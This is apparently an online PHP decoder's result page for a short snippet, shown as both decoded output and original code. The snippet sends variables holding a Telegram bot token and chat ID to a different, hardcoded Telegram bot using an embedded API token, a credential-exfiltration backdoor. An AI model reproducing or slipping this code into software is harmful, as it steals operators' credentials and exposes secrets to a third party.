Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $test = " TOKEN => $bot_token CHATID => $chat_id "; $apiToken = "6436099636:A..
Decoded Output download
<?php
$test = " TOKEN => $bot_token CHATID => $chat_id ";
$apiToken = "6436099636:AAFerkC-IB2eQCgxUtTCPiqPeUO2ktSRaZs";
$data = [
'chat_id' => '5418135751',
'text' => $test
];
$response = file_get_contents("https://api.telegram.org/bot$apiToken/sendMessage?" .
http_build_query($data) );
?>
Did this file decode correctly?
Original Code
<?php
$test = " TOKEN => $bot_token CHATID => $chat_id ";
$apiToken = "6436099636:AAFerkC-IB2eQCgxUtTCPiqPeUO2ktSRaZs";
$data = [
'chat_id' => '5418135751',
'text' => $test
];
$response = file_get_contents("https://api.telegram.org/bot$apiToken/sendMessage?" .
http_build_query($data) );
?>
Function Calls
None |
Stats
MD5 | 291c3b8b847d4c66267c201c8e84c964 |
Eval Count | 0 |
Decode Time | 107 ms |